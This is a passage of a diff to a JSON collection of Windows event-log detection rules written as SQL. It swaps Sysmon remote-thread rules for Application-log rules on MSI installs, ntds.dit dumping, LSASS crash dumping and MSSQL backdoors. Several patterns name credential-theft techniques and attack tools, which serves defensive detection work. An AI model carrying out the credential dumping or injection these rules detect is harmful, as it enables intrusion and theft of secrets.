"author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Application Uninstalled", + "id": "570ae5ec-33dc-427c-b815-db86228ad43e", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An application has been removed. Check if it is critical.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_builtin_remove_application.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.012" + "attack.t1219" ], "falsepositives": [ - "There are no known false positives at this time" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "sysmon_process_hollowing.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "title": "MSI Installation From Suspicious Locations", + "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", + "description": "Detects MSI package installation from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_msi_install_from_susp_locations.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "title": "MSI Installation From Web", + "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "status": "experimental", + "description": "Detects installation of a remote msi file from web.", + "author": "Stamatis Chatzimangou", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1218", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_msi_install_from_web.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "status": "experimental", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Dump Ntds.dit To Suspicious Location", + "id": "94dc4390-6b7c-4784-8ffc-335334404650", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_esent_ntdsutil_abuse_susp_location.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "title": "Ntdsutil Abuse", + "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate backup operation/creating shadow copies" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_esent_ntdsutil_abuse.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", + "attack.credential_access", + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Suspicious Remote Thread Target", - "id": "f016c716-754a-467f-a39e-63c06f773987", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_remote_thread_target.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "status": "experimental", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Antivirus products" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_software_restriction_policies_block.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", - "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "test", + "description": "Detects backup catalog deletions", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1055" + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_susp_backup_delete.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "status": "experimental", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "WMI Event Subscription", - "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", - "status": "test", - "description": "Detects creation of WMI event subscription persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "status": "experimental", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.persistence" ], "falsepositives": [ - "Exclude legitimate (vetted) use of WMI event subscription in your network" + "Legitimate use of the feature by administrators (rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_event_subscription.yml" + "filename": 